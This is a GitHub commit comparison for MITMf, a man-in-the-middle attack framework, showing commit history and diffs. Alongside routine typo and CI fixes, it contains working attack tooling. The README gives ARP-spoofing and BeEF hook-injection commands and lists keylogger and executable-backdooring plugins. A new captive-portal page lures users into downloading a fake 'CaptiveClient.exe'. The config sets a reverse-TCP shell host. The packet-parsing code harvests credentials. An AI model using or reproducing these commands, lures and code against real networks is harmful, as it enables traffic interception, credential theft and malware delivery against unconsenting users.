Compare commits

..

73 commits

Author SHA1 Message Date
byt3bl33d3r
0458300e58
Update README.md 2018-08-28 23:37:24 +08:00
byt3bl33d3r
ca6ba15ee3
Update README.md 2018-08-28 23:37:00 +08:00
byt3bl33d3r
067cc4e337
Merge pull request #472 from rememberYou/fix/display
Fix indentation for arpmode
2018-05-04 11:19:17 -06:00
byt3bl33d3r
18814dd1a0
Merge pull request #473 from rememberYou/fix/alias-banner
Fix useless banner alias
2018-05-04 11:19:08 -06:00
byt3bl33d3r
0c844045cb
Merge pull request #474 from rememberYou/fix/file-reading
Add refactoring of file reading
2018-05-04 11:18:59 -06:00
Terencio Agozzino
2f802e71c7 Add refactoring of file reading 2018-05-03 20:28:54 +02:00
Terencio Agozzino
ab5a969e23 Fix useless banner alias 2018-05-03 19:56:31 +02:00
Terencio Agozzino
e44551bd54 Fix indentation for arpmode 2018-05-03 19:51:57 +02:00
byt3bl33d3r
906c7951df
Merge pull request #279 from oscar1/master
possible fix issue  #253 and #227
2018-03-27 01:59:47 +08:00
byt3bl33d3r
6407b1df9f
Merge pull request #416 from jlcmoore/master
Https load error, and incorrect variable name
2018-03-27 01:59:35 +08:00
byt3bl33d3r
8588921e09
Merge pull request #450 from sensepost/master
Netcreds update, fixing some versions of the CHALLENGE NOT FOUND bug.
2018-03-27 01:59:18 +08:00
Reino Mostert
9c4313c0eb This commit includes various fixes made to netcreds over the past two years. Most notably, it fixes the issue in which parse_netntlm_chal passes arguments to parse_ntlm_chal in the wrong order, and not parsing HTTP headers correctly in headers_to_dict, thus causing the CHALLENGE NOT FOUND bug. This resolves https://github.com/byt3bl33d3r/MITMf/issues/436. The output format changes in netcreds have been left out of this commit. 2018-02-19 18:01:36 +02:00
byt3bl33d3r
ba0989b677
Update README.md 2017-12-20 17:46:29 -07:00
byt3bl33d3r
da0c7356fe Merge pull request #425 from OmgImAlexis/master
fix header markdown
2017-10-18 10:28:56 -06:00
Alexis Tyler
aa11f2a12b
fix header markdown 2017-10-16 19:57:34 +10:30
Jared Moore
c8db6d3568 Https load error, and incorrect variable name 2017-08-07 09:57:56 -05:00
byt3bl33d3r
d535950994 Merge pull request #397 from Ritiek/master
Fix typo
2017-05-01 09:41:11 -06:00
byt3bl33d3r
5bf3e29e01 Update README.md 2017-04-30 23:56:19 -06:00
Ritiek Malhotra
182b3d704b Fix typo 2017-05-01 07:42:57 +05:30
byt3bl33d3r
13d469d979 Merge pull request #394 from camilleeyries/patch-1
Notice user when not running as root.
2017-04-28 11:47:06 -06:00
Camille Eyriès
acff5e6e44 Notice user when not running as root.
The mocking message that was at this place before was... hurting.
Fixed. ( maybe it's a design principe, I don't know )

Exemple output: ```
 __  __   ___   .--.          __  __   ___              
|  |/  `.'   `. |__|         |  |/  `.'   `.      _.._  
|   .-.  .-.   '.--.     .|  |   .-.  .-.   '   .' .._| 
|  |  |  |  |  ||  |   .' |_ |  |  |  |  |  |   | '     
|  |  |  |  |  ||  | .'     ||  |  |  |  |  | __| |__   
|  |  |  |  |  ||  |'--.  .-'|  |  |  |  |  ||__   __|  
|  |  |  |  |  ||  |   |  |  |  |  |  |  |  |   | |     
|__|  |__|  |__||__|   |  |  |__|  |__|  |__|   | |     
                       |  '.'                   | |     
                       |   /                    | |     
                       `'-'                     |_|

[-] The derp is strong with this one
TIP: you may run MITMf as root.
```
2017-04-28 18:47:26 +02:00
byt3bl33d3r
431e0a78ec Merge pull request #389 from bryant1410/master
Fix broken headings in Markdown files
2017-04-18 20:36:53 -06:00
byt3bl33d3r
b04112ce07 Merge pull request #385 from gigawhitlocks/gigawhitlocks-patch-1
Fix misspelling in README
2017-04-18 20:36:34 -06:00
Santiago Castro
24d8722db3 Fix broken Markdown headings 2017-04-17 05:25:20 -03:00
Ian Whitlock
0684f7c156 Fix misspelling in README 2017-03-31 10:49:40 -05:00
byt3bl33d3r
0e81e40388 Merge pull request #254 from onedv/master
Captive portal redirecting using 302
2016-12-12 23:39:55 -07:00
byt3bl33d3r
40a5527358 Merge pull request #356 from hackereg35/patch-2
Update packetfilter.py
2016-12-12 23:36:32 -07:00
byt3bl33d3r
0c8c555158 Merge pull request #357 from hackereg35/patch-3
Update mitmf.py
2016-12-12 23:36:23 -07:00
byt3bl33d3r
e8dd557592 Merge pull request #346 from ZonkSec/master
spelling correction on "Zapped a strict-trasport-security header"
2016-12-12 23:18:45 -07:00
hackereg35
726c823628 Update mitmf.py
Added multi filter support
2016-11-03 15:55:13 +02:00
hackereg35
37937f74ba Update packetfilter.py
Added multi filter support
2016-11-03 15:49:06 +02:00
ZonkSec
f04ccf9d31 Update ServerConnection.py 2016-10-11 12:17:33 -05:00
ZonkSec
6e9d9ba707 Update ServerConnection.py 2016-10-11 12:16:27 -05:00
byt3bl33d3r
2dc1dd4f12 Hold on to your butts cause here we go.
This should resolve:
* Issue #307
* Issue #309
* Issue #302
* Issue #294

Apperently, Twisted made some fairly heavy API changes in their 16.x
release which kinda fucked all the plugins up.
2016-06-08 23:39:58 -06:00
oscar1
18c8f9119c Merge pull request #1 from oscar1/oscar1-patch-1
Update ARP.py
2016-03-06 15:50:40 +01:00
oscar1
d59b282fb9 Update ARP.py
small change to fix the "half duplex" issue. First; without the fix I don't receive any packets from the remote host to the target. I only received packets from the target to the remote host. Second; the original code wasn't "symmetric". Tested on kali2 with a linksys WRT54GL router on WiFI. Compared the ARP packets to those produced by ettercap, which was working correctly on my system. Including the fix resembles the ettercap method. It also works correctly when the arguments to the Ether() constructor are removed altogether.

Note that the problem occurs when not using any modules at all, only a simple filter and the spoofplugin. The problem may also be routerspecific, I dont know.
2016-03-06 15:48:40 +01:00
byt3bl33d3r
06ef1da084 Merge pull request #259 from HAMIDx9/master
Multiple fixes, netcreds, hsts dns, inject plugin
2016-01-30 11:51:09 -07:00
HAMIDx9
96e0b5f0e0 Fix #230 HSTS bypass DNS problem when timeout occures 2016-01-29 01:43:45 +03:30
HAMIDx9
f8293c38c9 Fix returning data, check mime to avoid heavy chardet process we are not interested in other mimes. 2016-01-29 01:42:54 +03:30
HAMIDx9
2490b87f43 Fix printer format to print logs and avoid netcreds shutting down 2016-01-28 22:03:07 +03:30
Oliver Nettinger
822b87e77c Captive Portal related changes
Made options exclusive
Added OSX files to .gitignore
Update README with plugin
2016-01-19 07:52:23 +01:00
Oliver Nettinger
681be498a9 Added captive portal plugin 2016-01-14 11:11:21 +01:00
byt3bl33d3r
d542dc139f Merge branch 'master' of github.com:byt3bl33d3r/MITMf 2015-11-03 17:57:47 -07:00
byt3bl33d3r
640f02a8a3 Added imagerandomizer plugin 2015-11-03 17:57:41 -07:00
byt3bl33d3r
5a6e0f6f48 Merge pull request #204 from xmcp/xmcp-patch-1
fixes #201
2015-10-22 12:31:51 -06:00
byt3bl33d3r
d0b4fd66fa Merge pull request #207 from orthographic-pedant/spell_check/arbitrary
Fixed typographical error, changed arbitary to arbitrary in README.
2015-09-30 19:50:14 -05:00
orthographic-pedant
ba280cc64c Fixed typographical error, changed arbitary to arbitrary in README. 2015-09-30 18:51:40 -04:00
xiao-mou
f7396d631d bugfix 2015-09-28 21:22:10 +08:00
byt3bl33d3r
f6ffad2879 Merge pull request #193 from xmcp/xmcp-patch-1
fixes #192
2015-09-14 20:27:21 +02:00
byt3bl33d3r
589e45b64f Fixed IPtables for APF Mode
Added a new banner
2015-09-14 20:25:24 +02:00
xiao-mou
b04d2e0258 bugfix 2015-09-10 17:20:15 +08:00
byt3bl33d3r
16b774248d updated bdfactory to latest commit 2015-09-06 13:52:32 +02:00
byt3bl33d3r
5b7967f02d removed setup.sh 2015-09-06 13:28:24 +02:00
byt3bl33d3r
d1df76c601 fixes #188 2015-09-06 13:14:12 +02:00
byt3bl33d3r
22a43df4f8 DNS server now outputs all queries to seperate log file
Fixed a bug where the SSLStrip proxy wouldn't allow caching if the AppCache poison plugin is enabled
HTTP and SMB servers now listen on all interfaces
2015-09-06 12:47:07 +02:00
byt3bl33d3r
9add87c5b2 Fixed a bug where the DNS server would throw a traceback when multiple named servers are specified 2015-09-06 11:23:45 +02:00
byt3bl33d3r
a0fecd4a38 reverts changes from PR #183, fixes issue #187 2015-09-06 10:51:40 +02:00
byt3bl33d3r
bb3078ca40 added an actual .coveragerc for coverage 2015-09-05 15:41:32 +02:00
byt3bl33d3r
f7da7926df added coveralls support in travis 2015-09-05 15:19:46 +02:00
byt3bl33d3r
2042e8350d Merge branch 'master' of github.com:byt3bl33d3r/MITMf 2015-09-05 14:57:15 +02:00
byt3bl33d3r
96c83ee565 added coveralls badge to the readme 2015-09-05 14:56:44 +02:00
byt3bl33d3r
c870d80d04 Merge pull request #183 from HAMIDx9/master
Fix improperly use config multiple nameservers
2015-09-05 14:45:33 +02:00
byt3bl33d3r
3fb6f21153 travis now uses notices instead of messages 2015-09-05 14:40:52 +02:00
byt3bl33d3r
333234a445 add skip_join to travis 2015-09-05 14:35:40 +02:00
byt3bl33d3r
c0934e1179 travis is picky 2015-09-05 14:25:33 +02:00
byt3bl33d3r
766e5b7a44 changed default IRC message template 2015-09-05 14:20:12 +02:00
byt3bl33d3r
650525ef12 added IRC notifications for travis 2015-09-05 13:56:01 +02:00
byt3bl33d3r
7512c51af5 updated .travis.yml for faster tests 2015-09-05 13:46:16 +02:00
HAMIDx9
00745afb35 Fix improperly use config multiple nameservers 2015-09-03 11:50:02 +04:30
byt3bl33d3r
df608030f3 fixes #178, we are now manually adding an Ether() layer to ARP packets and sending them at L2 2015-09-02 14:47:25 +02:00
byt3bl33d3r
e54b90aa7b fixes #182, iptables rules weren't being set 2015-09-02 12:02:56 +02:00
byt3bl33d3r
54c27ddade fixed Net-Creds tests 2015-09-01 14:31:12 +02:00
byt3bl33d3r
986b2b851f Fixed bug where Net-Creds wouldn't parse URL's and HTTP data when reading from pcap
Active packet filtering engine and proxy + servers are now mutually exclusive , you can only start one of them (iptable conflicts)
2015-09-01 14:15:21 +02:00
43 changed files with 633 additions and 269 deletions

8
.coveragerc Normal file
View file

@ -0,0 +1,8 @@
[run]
branch = True
[report]
include = *core*, *libs*, *plugins*
exclude_lines =
pragma: nocover
pragma: no cover

4
.gitignore vendored
View file

@ -57,3 +57,7 @@ docs/_build/
# PyBuilder # PyBuilder
target/ target/
# OSX Stuff
.DS_Store
._.DS_Store

View file

@ -1,11 +1,27 @@
language: python language: python
python: python:
- "2.7" - "2.7"
sudo: required
before_install: addons:
- "ifconfig" apt:
- "sudo apt-get update -qq" packages:
- "sudo apt-get install tcpdump libpcap0.8-dev libnetfilter-queue-dev libssl-dev" - libpcap0.8-dev
- libnetfilter-queue-dev
- libssl-dev
notifications:
irc:
channels:
- "irc.freenode.org#MITMf"
template:
- "%{repository}#%{build_number} (%{branch} - %{commit} - %{commit_subject} : %{author}): %{message}"
skip_join: true
use_notice: true
install: "pip install -r requirements.txt" install: "pip install -r requirements.txt"
script: nosetests before_script:
- "pip install python-coveralls"
script:
- "nosetests --with-cov"
after_success:
- coveralls

View file

@ -1,4 +1,4 @@
#Intentional contributors (in no particular order) # Intentional contributors (in no particular order)
- @rthijssen - @rthijssen
- @ivangr0zni (Twitter) - @ivangr0zni (Twitter)
@ -13,7 +13,7 @@
- @auraltension - @auraltension
- @HAMIDx9 - @HAMIDx9
#Unintentional contributors and/or projects that I stole code from # Unintentional contributors and/or projects that I stole code from
- Metasploit Framework's os.js and Javascript Keylogger module - Metasploit Framework's os.js and Javascript Keylogger module
- Responder by Laurent Gaffie - Responder by Laurent Gaffie

43
README.md Normal file → Executable file
View file

@ -3,11 +3,14 @@
![Supported OS](https://img.shields.io/badge/Supported%20OS-Linux-yellow.svg) ![Supported OS](https://img.shields.io/badge/Supported%20OS-Linux-yellow.svg)
[![Code Climate](https://codeclimate.com/github/byt3bl33d3r/MITMf/badges/gpa.svg)](https://codeclimate.com/github/byt3bl33d3r/MITMf) [![Code Climate](https://codeclimate.com/github/byt3bl33d3r/MITMf/badges/gpa.svg)](https://codeclimate.com/github/byt3bl33d3r/MITMf)
[![Build Status](https://travis-ci.org/byt3bl33d3r/MITMf.svg)](https://travis-ci.org/byt3bl33d3r/MITMf) [![Build Status](https://travis-ci.org/byt3bl33d3r/MITMf.svg)](https://travis-ci.org/byt3bl33d3r/MITMf)
[![Coverage Status](https://coveralls.io/repos/byt3bl33d3r/MITMf/badge.svg?branch=master&service=github)](https://coveralls.io/github/byt3bl33d3r/MITMf?branch=master)
#MITMf # MITMf
Framework for Man-In-The-Middle attacks Framework for Man-In-The-Middle attacks
**This project is no longer being updated. MITMf was written to address the need, at the time, of a modern tool for performing Man-In-The-Middle attacks. Since then many other tools have been created to fill this space, you should probably be using [Bettercap](https://github.com/bettercap/bettercap) as it is far more feature complete and better maintained.**
Quick tutorials, examples and developer updates at: https://byt3bl33d3r.github.io Quick tutorials, examples and developer updates at: https://byt3bl33d3r.github.io
This tool is based on [sergio-proxy](https://github.com/supernothing/sergio-proxy) and is an attempt to revive and update the project. This tool is based on [sergio-proxy](https://github.com/supernothing/sergio-proxy) and is an attempt to revive and update the project.
@ -15,7 +18,7 @@ This tool is based on [sergio-proxy](https://github.com/supernothing/sergio-prox
Contact me at: Contact me at:
- Twitter: @byt3bl33d3r - Twitter: @byt3bl33d3r
- IRC on Freenode: #MITMf - IRC on Freenode: #MITMf
- Email: byt3bl33d3r@gmail.com - Email: byt3bl33d3r@protonmail.com
**Before submitting issues, please read the relevant [section](https://github.com/byt3bl33d3r/MITMf/wiki/Reporting-a-bug) in the wiki .** **Before submitting issues, please read the relevant [section](https://github.com/byt3bl33d3r/MITMf/wiki/Reporting-a-bug) in the wiki .**
@ -111,13 +114,33 @@ Inject a JS script:
```python mitmf.py -i enp3s0 --inject --js-url http://beef:3000/hook.js``` ```python mitmf.py -i enp3s0 --inject --js-url http://beef:3000/hook.js```
Start a captive portal that redirects everything to http://SERVER/PATH:
```python mitmf.py -i enp3s0 --spoof --arp --gateway 192.168.1.1 --captive --portalurl http://SERVER/PATH```
Start captive portal at http://your-ip/portal.html using default page /portal.html (thx responder) and /CaptiveClient.exe (not included) from the config/captive folder:
```python mitmf.py -i enp3s0 --spoof --arp --gateway 192.168.1.1 --captive```
Same as above but with hostname captive.portal instead of IP (requires captive.portal to resolve to your IP, e.g. via DNS spoof):
```python mitmf.py -i enp3s0 --spoof --arp --gateway 192.168.1.1 --dns --captive --use-dns```
Serve a captive portal with an additional SimpleHTTPServer instance serving the LOCALDIR at http://IP:8080 (change port in mitmf.config):
```python mitmf.py -i enp3s0 --spoof --arp --gateway 192.168.1.1 --captive --portaldir LOCALDIR```
Same as above but with hostname:
```python mitmf.py -i enp3s0 --spoof --arp --gateway 192.168.1.1 --dns --captive --portaldir LOCALDIR --use-dns```
And much much more! And much much more!
Of course you can mix and match almost any plugin together (e.g. ARP spoof + inject + Responder etc..) Of course you can mix and match almost any plugin together (e.g. ARP spoof + inject + Responder etc..)
For a complete list of available options, just run ```python mitmf.py --help``` For a complete list of available options, just run ```python mitmf.py --help```
#Currently available plugins # Currently available plugins
- **HTA Drive-By** : Injects a fake update notification and prompts clients to download an HTA application - **HTA Drive-By** : Injects a fake update notification and prompts clients to download an HTA application
- **SMBTrap** : Exploits the 'SMB Trap' vulnerability on connected clients - **SMBTrap** : Exploits the 'SMB Trap' vulnerability on connected clients
@ -127,12 +150,22 @@ For a complete list of available options, just run ```python mitmf.py --help```
- **Spoof** : Redirect traffic using ARP, ICMP, DHCP or DNS spoofing - **Spoof** : Redirect traffic using ARP, ICMP, DHCP or DNS spoofing
- **BeEFAutorun** : Autoruns BeEF modules based on a client's OS or browser type - **BeEFAutorun** : Autoruns BeEF modules based on a client's OS or browser type
- **AppCachePoison** : Performs HTML5 App-Cache poisoning attacks - **AppCachePoison** : Performs HTML5 App-Cache poisoning attacks
- **Ferret-NG** : Transperently hijacks client sessions - **Ferret-NG** : Transparently hijacks client sessions
- **BrowserProfiler** : Attempts to enumerate all browser plugins of connected clients - **BrowserProfiler** : Attempts to enumerate all browser plugins of connected clients
- **FilePwn** : Backdoor executables sent over HTTP using the Backdoor Factory and BDFProxy - **FilePwn** : Backdoor executables sent over HTTP using the Backdoor Factory and BDFProxy
- **Inject** : Inject arbitrary content into HTML content - **Inject** : Inject arbitrary content into HTML content
- **BrowserSniper** : Performs drive-by attacks on clients with out-of-date browser plugins - **BrowserSniper** : Performs drive-by attacks on clients with out-of-date browser plugins
- **JSkeylogger** : Injects a Javascript keylogger into a client's webpages - **JSkeylogger** : Injects a Javascript keylogger into a client's webpages
- **Replace** : Replace arbitary content in HTML content - **Replace** : Replace arbitrary content in HTML content
- **SMBAuth** : Evoke SMB challenge-response authentication attempts - **SMBAuth** : Evoke SMB challenge-response authentication attempts
- **Upsidedownternet** : Flips images 180 degrees - **Upsidedownternet** : Flips images 180 degrees
- **Captive** : Creates a captive portal, redirecting HTTP requests using 302
# How to fund my tea & sushi reserve
BTC: 1ER8rRE6NTZ7RHN88zc6JY87LvtyuRUJGU
ETH: 0x91d9aDCf8B91f55BCBF0841616A01BeE551E90ee
LTC: LLMa2bsvXbgBGnnBwiXYazsj7Uz6zRe4fr

31
config/captive/portal.html Executable file
View file

@ -0,0 +1,31 @@
<html>
<head>
<title>Captive Portal</title>
<style>
<!--
body, ul, li { font-family:Arial, Helvetica, sans-serif; font-size:14px; color:#737373; margin:0; padding:0;}
.content { padding: 20px 15px 15px 40px; width: 500px; margin: 70px auto 6px auto; border: #D52B1E solid 2px;}
.blocking { border-top: #D52B1E solid 2px; border-bottom: #D52B1E solid 2px;}
.title { font-size: 24px; border-bottom: #ccc solid 1px; padding-bottom:15px; margin-bottom:15px;}
.details li { list-style: none; padding: 4px 0;}
.footer { color: #6d90e7; font-size: 14px; width: 540px; margin: 0 auto; text-align:right; }
-->
</style>
</head>
<body>
<center>
<div class="content blocking">
<div class="title" id="msg_title"><b>Client Required</b></div>
<ul class="details">
<div id="main_block">
<div id="msg_long_reason">
<li><b>Access has been blocked. Please download and install the new </b><span class="url"><a href="CaptiveClient.exe"><b>Captive Portal Client</b></a></span><b> in order to access internet resources.</b></li>
</div>
</ul>
</div>
<div class="footer">ISA Security <b>Captive Server</b></div>
</center>
</body>
</html>

19
config/mitmf.conf Normal file → Executable file
View file

@ -38,6 +38,7 @@
[[[A]]] # Queries for IPv4 address records [[[A]]] # Queries for IPv4 address records
*.thesprawl.org=192.168.178.27 *.thesprawl.org=192.168.178.27
*.captive.portal=192.168.1.100
[[[AAAA]]] # Queries for IPv6 address records [[[AAAA]]] # Queries for IPv6 address records
*.thesprawl.org=2001:db8::1 *.thesprawl.org=2001:db8::1
@ -75,11 +76,19 @@
# #
# Plugin configuration starts here # Plugin configuration starts here
# #
[Captive]
# Set Server Port and string if we are serving our own portal from SimpleHTTPServer (80 is already used by default server)
Port = 8080
ServerString = "Captive Server 1.0"
# Set the filename served as /CaptivePortal.exe by integrated http server
PayloadFilename = config/captive/calc.exe
[Replace] [Replace]
[[Regex1]] [[Regex1]]
'Google Search' = 'Google yssas' 'Google Search' = '44CON'
[[Regex2]] [[Regex2]]
"I'm Feeling Lucky" = "I'm Feeling Something In My Pants" "I'm Feeling Lucky" = "I'm Feeling Something In My Pants"
@ -89,7 +98,7 @@
# Here you can specify the client to hijack sessions from # Here you can specify the client to hijack sessions from
# #
Client = '192.168.1.26' Client = '10.0.237.91'
[SSLstrip+] [SSLstrip+]
@ -445,10 +454,10 @@
PATCH_TYPE = APPEND #JUMP/SINGLE/APPEND PATCH_TYPE = APPEND #JUMP/SINGLE/APPEND
# PATCH_METHOD overwrites PATCH_TYPE, use automatic, replace, or onionduke # PATCH_METHOD overwrites PATCH_TYPE, use automatic, replace, or onionduke
PATCH_METHOD = automatic PATCH_METHOD = automatic
HOST = 192.168.1.16 HOST = 192.168.20.79
PORT = 8090 PORT = 8090
# SHELL for use with automatic PATCH_METHOD # SHELL for use with automatic PATCH_METHOD
SHELL = iat_reverse_tcp_inline_threaded SHELL = iat_reverse_tcp_stager_threaded
# SUPPLIED_SHELLCODE for use with a user_supplied_shellcode payload # SUPPLIED_SHELLCODE for use with a user_supplied_shellcode payload
SUPPLIED_SHELLCODE = None SUPPLIED_SHELLCODE = None
ZERO_CERT = True ZERO_CERT = True
@ -503,7 +512,7 @@
LinuxType = None LinuxType = None
WindowsType = ALL WindowsType = ALL
CompressedFiles = False CompressedFiles = False
#inherits WindowsIntelx32 from ALL #inherits WindowsIntelx86 from ALL
[[[[WindowsIntelx86]]]] [[[[WindowsIntelx86]]]]
PATCH_DLL = False PATCH_DLL = False
ZERO_CERT = True ZERO_CERT = True

View file

@ -65,6 +65,18 @@ banner4 = """
""" """
banner5 = """
@@@@@@@@@@ @@@ @@@@@@@ @@@@@@@@@@ @@@@@@@@
@@@@@@@@@@@ @@@ @@@@@@@ @@@@@@@@@@@ @@@@@@@@
@@! @@! @@! @@! @@! @@! @@! @@! @@!
!@! !@! !@! !@! !@! !@! !@! !@! !@!
@!! !!@ @!@ !!@ @!! @!! !!@ @!@ @!!!:!
!@! ! !@! !!! !!! !@! ! !@! !!!!!:
!!: !!: !!: !!: !!: !!: !!:
:!: :!: :!: :!: :!: :!: :!:
::: :: :: :: ::: :: ::
: : : : : : :
"""
def get_banner(): def get_banner():
banners = [banner1, banner2, banner3, banner4] return random.choice([banner1, banner2, banner3, banner4, banner5])
return random.choice(banners)

View file

@ -342,6 +342,12 @@ class Session(object):
logs.append(Log(log)) logs.append(Log(log))
return logs return logs
def update(self, options={}):
headers = {"Content-Type": "application/json", "charset": "UTF-8"}
payload = json.dumps(options)
r = requests.post("{}/hooks/update/{}?token={}".format(self.url, self.session, self.token), headers=headers, data=payload)
return r.json()
def run(self, module_id, options={}): def run(self, module_id, options={}):
headers = {"Content-Type": "application/json", "charset": "UTF-8"} headers = {"Content-Type": "application/json", "charset": "UTF-8"}
payload = json.dumps(options) payload = json.dumps(options)

View file

@ -21,7 +21,7 @@ import pyinotify
import threading import threading
from configobj import ConfigObj from configobj import ConfigObj
class ConfigWatcher(pyinotify.ProcessEvent): class ConfigWatcher(pyinotify.ProcessEvent, object):
@property @property
def config(self): def config(self):

View file

@ -110,7 +110,7 @@ class ServerConnection(HTTPClient):
self.isCompressed = True self.isCompressed = True
elif (key.lower()== 'strict-transport-security'): elif (key.lower()== 'strict-transport-security'):
log.debug("[ServerConnection] Zapped a strict-trasport-security header") log.debug("[ServerConnection] Zapped a strict-transport-security header")
elif (key.lower() == 'content-length'): elif (key.lower() == 'content-length'):
self.contentLength = value self.contentLength = value

View file

@ -75,13 +75,13 @@ class mitmfapi(ConfigWatcher):
if status == "1": if status == "1":
for p in ProxyPlugins().all_plugins: for p in ProxyPlugins().all_plugins:
if (p.name == plugin) and (p not in ProxyPlugins().plugin_list): if (p.name == plugin) and (p not in ProxyPlugins().plugin_list):
ProxyPlugins().addPlugin(p) ProxyPlugins().add_plugin(p)
return json.dumps({"plugin": plugin, "response": "success"}) return json.dumps({"plugin": plugin, "response": "success"})
elif status == "0": elif status == "0":
for p in ProxyPlugins().plugin_list: for p in ProxyPlugins().plugin_list:
if p.name == plugin: if p.name == plugin:
ProxyPlugins().removePlugin(p) ProxyPlugins().remove_plugin(p)
return json.dumps({"plugin": plugin, "response": "success"}) return json.dumps({"plugin": plugin, "response": "success"})
return json.dumps({"plugin": plugin, "response": "failed"}) return json.dumps({"plugin": plugin, "response": "failed"})

View file

@ -41,6 +41,8 @@ NTLMSSP3_re = 'NTLMSSP\x00\x03\x00\x00\x00.+'
# Prone to false+ but prefer that to false- # Prone to false+ but prefer that to false-
http_search_re = '((search|query|&q|\?q|search\?p|searchterm|keywords|keyword|command|terms|keys|question|kwd|searchPhrase)=([^&][^&]*))' http_search_re = '((search|query|&q|\?q|search\?p|searchterm|keywords|keyword|command|terms|keys|question|kwd|searchPhrase)=([^&][^&]*))'
parsing_pcap = False
class NetCreds: class NetCreds:
version = "1.0" version = "1.0"
@ -51,16 +53,65 @@ class NetCreds:
except Exception as e: except Exception as e:
if "Interrupted system call" in e: pass if "Interrupted system call" in e: pass
def start(self, interface, ip, pcap): def start(self, interface, ip):
if pcap:
for pkt in PcapReader(pcap):
pkt_parser(pkt)
sys.exit()
else:
t = threading.Thread(name='NetCreds', target=self.sniffer, args=(interface, ip,)) t = threading.Thread(name='NetCreds', target=self.sniffer, args=(interface, ip,))
t.setDaemon(True) t.setDaemon(True)
t.start() t.start()
def parse_pcap(self, pcap):
parsing_pcap=True
for pkt in PcapReader(pcap):
pkt_parser(pkt)
sys.exit()
def frag_remover(ack, load):
'''
Keep the FILO OrderedDict of frag loads from getting too large
3 points of limit:
Number of ip_ports < 50
Number of acks per ip:port < 25
Number of chars in load < 5000
'''
global pkt_frag_loads
# Keep the number of IP:port mappings below 50
# last=False pops the oldest item rather than the latest
while len(pkt_frag_loads) > 50:
pkt_frag_loads.popitem(last=False)
# Loop through a deep copy dict but modify the original dict
copy_pkt_frag_loads = copy.deepcopy(pkt_frag_loads)
for ip_port in copy_pkt_frag_loads:
if len(copy_pkt_frag_loads[ip_port]) > 0:
# Keep 25 ack:load's per ip:port
while len(copy_pkt_frag_loads[ip_port]) > 25:
pkt_frag_loads[ip_port].popitem(last=False)
# Recopy the new dict to prevent KeyErrors for modifying dict in loop
copy_pkt_frag_loads = copy.deepcopy(pkt_frag_loads)
for ip_port in copy_pkt_frag_loads:
# Keep the load less than 75,000 chars
for ack in copy_pkt_frag_loads[ip_port]:
# If load > 5000 chars, just keep the last 200 chars
if len(copy_pkt_frag_loads[ip_port][ack]) > 5000:
pkt_frag_loads[ip_port][ack] = pkt_frag_loads[ip_port][ack][-200:]
def frag_joiner(ack, src_ip_port, load):
'''
Keep a store of previous fragments in an OrderedDict named pkt_frag_loads
'''
for ip_port in pkt_frag_loads:
if src_ip_port == ip_port:
if ack in pkt_frag_loads[src_ip_port]:
# Make pkt_frag_loads[src_ip_port][ack] = full load
old_load = pkt_frag_loads[src_ip_port][ack]
concat_load = old_load + load
return OrderedDict([(ack, concat_load)])
return OrderedDict([(ack, load)])
def pkt_parser(pkt): def pkt_parser(pkt):
''' '''
Start parsing packets here Start parsing packets here
@ -127,53 +178,7 @@ def pkt_parser(pkt):
telnet_logins(src_ip_port, dst_ip_port, load, ack, seq) telnet_logins(src_ip_port, dst_ip_port, load, ack, seq)
# HTTP and other protocols that run on TCP + a raw load # HTTP and other protocols that run on TCP + a raw load
other_parser(src_ip_port, dst_ip_port, full_load, ack, seq, pkt) other_parser(src_ip_port, dst_ip_port, full_load, ack, seq, pkt, True)
def frag_remover(ack, load):
'''
Keep the FILO OrderedDict of frag loads from getting too large
3 points of limit:
Number of ip_ports < 50
Number of acks per ip:port < 25
Number of chars in load < 5000
'''
global pkt_frag_loads
# Keep the number of IP:port mappings below 50
# last=False pops the oldest item rather than the latest
while len(pkt_frag_loads) > 50:
pkt_frag_loads.popitem(last=False)
# Loop through a deep copy dict but modify the original dict
copy_pkt_frag_loads = copy.deepcopy(pkt_frag_loads)
for ip_port in copy_pkt_frag_loads:
if len(copy_pkt_frag_loads[ip_port]) > 0:
# Keep 25 ack:load's per ip:port
while len(copy_pkt_frag_loads[ip_port]) > 25:
pkt_frag_loads[ip_port].popitem(last=False)
# Recopy the new dict to prevent KeyErrors for modifying dict in loop
copy_pkt_frag_loads = copy.deepcopy(pkt_frag_loads)
for ip_port in copy_pkt_frag_loads:
# Keep the load less than 75,000 chars
for ack in copy_pkt_frag_loads[ip_port]:
# If load > 5000 chars, just keep the last 200 chars
if len(copy_pkt_frag_loads[ip_port][ack]) > 5000:
pkt_frag_loads[ip_port][ack] = pkt_frag_loads[ip_port][ack][-200:]
def frag_joiner(ack, src_ip_port, load):
'''
Keep a store of previous fragments in an OrderedDict named pkt_frag_loads
'''
for ip_port in pkt_frag_loads:
if src_ip_port == ip_port:
if ack in pkt_frag_loads[src_ip_port]:
# Make pkt_frag_loads[src_ip_port][ack] = full load
old_load = pkt_frag_loads[src_ip_port][ack]
concat_load = old_load + load
return OrderedDict([(ack, concat_load)])
return OrderedDict([(ack, load)])
def telnet_logins(src_ip_port, dst_ip_port, load, ack, seq): def telnet_logins(src_ip_port, dst_ip_port, load, ack, seq):
''' '''
@ -530,14 +535,14 @@ def irc_logins(full_load, pkt):
msg = 'IRC pass: %s' % pass_search2.group(1) msg = 'IRC pass: %s' % pass_search2.group(1)
return msg return msg
def other_parser(src_ip_port, dst_ip_port, full_load, ack, seq, pkt): def other_parser(src_ip_port, dst_ip_port, full_load, ack, seq, pkt, verbose):
''' '''
Pull out pertinent info from the parsed HTTP packet data Pull out pertinent info from the parsed HTTP packet data
''' '''
user_passwd = None user_passwd = None
http_url_req = None http_url_req = None
method = None method = None
http_methods = ['GET ', 'POST', 'CONNECT ', 'TRACE ', 'TRACK ', 'PUT ', 'DELETE ', 'HEAD '] http_methods = ['GET ', 'POST ', 'CONNECT ', 'TRACE ', 'TRACK ', 'PUT ', 'DELETE ', 'HEAD ']
http_line, header_lines, body = parse_http_load(full_load, http_methods) http_line, header_lines, body = parse_http_load(full_load, http_methods)
headers = headers_to_dict(header_lines) headers = headers_to_dict(header_lines)
if 'host' in headers: if 'host' in headers:
@ -545,44 +550,51 @@ def other_parser(src_ip_port, dst_ip_port, full_load, ack, seq, pkt):
else: else:
host = '' host = ''
#if http_line != None: if parsing_pcap is True:
# method, path = parse_http_line(http_line, http_methods)
# http_url_req = get_http_url(method, host, path, headers) if http_line != None:
#if http_url_req != None: method, path = parse_http_line(http_line, http_methods)
#printer(src_ip_port, None, http_url_req) http_url_req = get_http_url(method, host, path, headers)
if http_url_req != None:
if verbose == False:
if len(http_url_req) > 98:
http_url_req = http_url_req[:99] + '...'
printer(src_ip_port, None, http_url_req)
# Print search terms # Print search terms
